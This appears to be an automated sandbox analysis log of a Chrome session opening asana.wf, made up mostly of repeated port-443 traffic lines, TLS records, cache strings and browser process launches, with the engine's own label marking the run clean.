          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
          Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
          Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
          Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
          Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
          Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
          Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
          Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
          Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
          Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
          Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
          Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
          Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
          Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
          Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
          Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
          Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
          Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
          Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
          Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
          Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
          Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
          Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
          Source: unknownHTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.16:49767 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.54.200.130:443 -> 192.168.2.16:49768 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.16:49769 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.16:49948 version: TLS 1.2
          Source: chromecache_343.1.drBinary or memory string: " <HOOK MODULE=\"DDRAW.DLL\" FUNCTION=\"DirectDrawCreateEx\"/>"memstr_f4da8964-c
          Source: chromecache_343.1.drBinary string: "\\Device\\DeviceApi\\CMApi",
          Source: chromecache_343.1.drBinary string: "\\Device\\ConDrv\\\\Input",
          Source: chromecache_343.1.drBinary string: "\\Device\\ConDrv\\\\Reference",
          Source: chromecache_343.1.drBinary string: "\\Device\\HarddiskVolume3\\Program Files\\Notepad++\\notepad++.exe",
          Source: chromecache_343.1.drBinary string: "\\Device\\KsecDD",
          Source: chromecache_343.1.drBinary string: "\\Device\\ConDrv\\\\Connect"
          Source: chromecache_343.1.drBinary string: "\\Device\\ConDrv\\Server",
          Source: chromecache_343.1.drBinary string: "\\Device\\HarddiskVolume3\\Users\\User\\Downloads\\npp.8.6.4.Installer.x64.exe"
          Source: chromecache_343.1.drBinary string: "\\Device\\HarddiskVolume3\\Windows\\explorer.exe",
          Source: classification engineClassification label: clean1.win@20/323@34/11
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://asana.wf/
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1936,i,14722219438862826777,18196455829393117014,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1936,i,14722219438862826777,18196455829393117014,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
